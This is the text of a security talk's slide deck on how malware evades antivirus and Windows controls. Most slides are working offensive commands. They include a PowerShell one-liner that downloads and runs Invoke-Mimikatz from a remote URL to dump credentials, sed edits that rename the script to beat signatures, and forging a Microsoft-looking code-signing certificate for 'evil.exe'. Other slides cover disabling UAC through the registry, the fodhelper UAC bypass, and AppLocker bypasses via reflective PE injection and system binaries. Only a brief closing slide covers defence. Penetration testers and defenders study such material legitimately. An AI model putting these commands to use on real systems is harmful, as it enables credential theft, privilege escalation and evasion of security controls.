Embed Size (px)
Citation preview
Endpoint protection is not enough.
BySumedt Jitpukdebodin
Senior Security Researcher @ I-SECURE
How Antivirus works
• Based on heuristic
• Based on signature
• Based on cloud
Malware Statistics
Distribution of malware under Windows in 2016
TOP 10 file extensions malware Q1 2017
Evasion Techniques
• Anti-security techniques (Avoid detection)
• Anti-sandbox techniques (Avoid automatic analysis)
• Anti-analyst techniques (Avoid analysis)
Anti-security techniques
• Obfuscation
• Crypter
• Packer
• FUD (Fully UnDetectable by antimalware)
• etc.
Framework for generate bypass antivirus malware
• Veil
• TheFatRat
• Winpayloads
• Dr0p1t-Framework
• Avet
• VBad
• Obfuscated Empire
• OWASP-ZSC
• etc
Invoke-Mimikatz
• powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
Just a Mimikatz
• sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
• sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
• sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
• sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
• sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
• sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1
• sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
Just a Mimikatz(2)
• powershell -exec bypass
• Import-Module Invoke-Mimikatz.ps1
• Invoke-Mimidogz
Sign malware with fake certificate
• osslsigncode verify <microsoft exe>
• openssl req -x509 -newkey rsa:4096 -keyout fake_microsoft_key.pem -out fake_microsoft_cert.pem -days 365 -subj “/C=US/ST=Washington/L=Redmond/O=Microsoft Corporation/OU=MOPR/CN=Microsoft Corporation”
• osslsigncode sign -in evil.exe -key fake_microsoft_key.pem -certs fake_microsoft_cert.pem -out evil_signed.exe
But run EXE is so hard…
Try to use indirect ways
• Macro
• vbs
• DLL
• hta (HTML Application)
• PS1
• etc.
Example of HTA with vbscript
Show time
Show time (2)
UAC• User Account Control (UAC)
• Run with standard user rights instead of full administrator rights
• C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
• C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
Bypass UAC• Using mistake of any autoElevate binary (Using sigcheck for check autoElevate flag)
• UACME
• DLL Hijacking
• autoElevate
• Elevated COM interface
• SDCLT - Backup command
• Fodhelper - Manage Optional Features
• Using process or dll injection into Windows Publisher Certificate
• Using Windows Update Standalone Installer (wusa.exe)
• etc.
Bypass UAC with Fodhelper• Fodhelper.exe (%WINDIR%\\System32\\fodhelper.exe)
• Missing registry
• HKCU:\Software\Classes\ms-settings\shell\open\command
• HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute
• HKCU:\Software\Classes\ms-settings\shell\open\command\(default)
Show time (3)
AppLocker
• Whitelisting application
• Executable files, scripts, Windows Installer files, dynamic-link libraries (DLLs), packaged apps, and packaged app installers
• Windows 7 >
• Single computer (secpol.msc), Group Policy Management (gpmc.msc)
AppLocker File Type
• These are regular .exe and .com applications (cmd.exe, ipconfig.exe, etc.)
• Windows Installer files (.msi, .msp, .mst), typically used to install a new software on the machine.
• Script files with the following extensions .ps1, .vbs, .vba, .cmd and .js.
• Packaged Apps installed through the Microsoft Store
• DLL files (.dll and .ocx in the advanced tab).
AppLocker Rule
• Execution Path
• Publisher Information
• File Hash
Bypass AppLocker• Find exception path
• “C:\Windows\Tasks”
• “C:\Windows\tracing”
• Load file from memory (PowerSploit framework)
• $ByteArray = [System.IO.File]::ReadAllBytes(“C:\users\richard\desktop\mimikatz.exe");
• Invoke-expression(Get-Content .\Invoke-ReflectivePEInjection.ps1 |out-string)
• Invoke-ReflectivePEInjection -PEBytes $ByteArray
• Obfuscate exe for bypass hash
• Powershell without powershell (Casey Smith) (Powershell Empire)
• Registry Key Manipulation
• Run PE file by using microsoft tool
• C:\windows\system32\rundll32.exe
• C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe ( install and uninstall applications via the command prompt)
• C:\Windows\System32\regsvr32.exe (Install and Uninstall dll file)
• C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (Using to build products in environments where Visual Studio is not installed)
Show time (4)
Protecting against malware
• People: Security Awareness Training
• Process: Restrict program install or usage with policy, Updates, Backups, Governance, Intelligence, Incident response plan, and more => Security Team
• Technology: Technology supports the team and processes
• Backup
• Antivirus
• Anti-ransomware
• Endpoint Detection
Q & A
Resource• https://www.blackhillsinfosec.com/?p=5555
• https://github.com/nccgroup/Winpayloads
• https://www.youtube.com/watch?v=6bUoz5ChTOs
• https://github.com/D4Vinci/Dr0p1t-Framework
• https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf
• https://www.av-test.org/fileadmin/pdf/security_report/AV-TEST_Security_Report_2016-2017.pdf
• https://github.com/Pepitoh/VBad
• https://stackoverflow.com/questions/18287960/signing-windows-application-on-linux-based-distros
• https://twitter.com/Andrew___Morris/status/879712530041626627
• https://github.com/cobbr/ObfuscatedEmpire
• https://pentestlab.blog/tag/uac/
• https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
• https://www.greyhathacker.net/?p=796
• https://pen-testing.sans.org/resources/papers/gpen/windows-script-host-hack-windows-120189
• https://www.slideshare.net/ThomasRoccia/malware-evasion-techniques
• https://www.slideshare.net/CTruncer/the-supporting-role-of-antivirus-evasion-while-persisting
• https://github.com/api0cradle/UltimateAppLockerByPassList
